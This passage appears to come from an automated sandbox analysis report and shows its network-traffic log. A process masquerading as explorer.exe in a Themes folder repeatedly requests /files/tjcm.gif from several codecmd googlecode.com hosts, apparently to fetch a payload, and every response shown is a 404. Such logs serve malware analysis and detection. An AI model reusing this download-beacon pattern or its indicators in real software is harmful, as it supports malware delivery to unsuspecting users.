                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:20.022921085 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                          Jan 13, 2025 13:17:20.022932053 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                          Jan 13, 2025 13:17:20.022989035 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:19 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:20.023344040 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:19 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:20.031030893 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          5192.168.2.44973764.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:21.414921999 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:22.119729996 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:22 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:22.119748116 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          6192.168.2.44974166.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:23.657912016 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:24.360690117 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:24 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:24.360723019 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          7192.168.2.44974374.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:25.950253010 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:26.645627975 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:26 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:26.645646095 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          8192.168.2.44974464.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:28.057588100 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:28.780839920 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:28 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:28.780858994 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          9192.168.2.44974566.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:30.200907946 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:30.841253042 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:30 GMT
